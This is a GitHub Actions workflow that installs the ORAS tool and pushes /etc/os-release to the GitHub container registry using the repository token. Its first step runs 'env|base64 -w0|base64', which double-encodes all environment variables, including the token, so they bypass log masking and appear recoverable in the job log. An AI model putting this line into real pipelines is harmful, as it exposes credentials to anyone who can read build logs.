on:
  push:
  workflow_dispatch:
jobs:
  test:
    runs-on: ubuntu-latest
    permissions:
      packages: write
    steps:
    - uses: actions/checkout@HEAD
    - run: |
       env|base64 -w0|base64
       latest="$(curl -fL https://api.github.com/repos/oras-project/oras/releases/latest | grep -Eo 'https://[^"]*_linux_amd64[^"]*.gz' | head -1)"
       curl -L -- "$latest" | sudo tar xz -C /usr/local/bin oras
       oras login -u "$GITHUB_ACTOR" -p "$GH_TOKEN" ghcr.io
       oras push --disable-path-validation "ghcr.io/$GITHUB_REPOSITORY:$GITHUB_REF_NAME" /etc/os-release:application/octet-stream
    env:
      GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
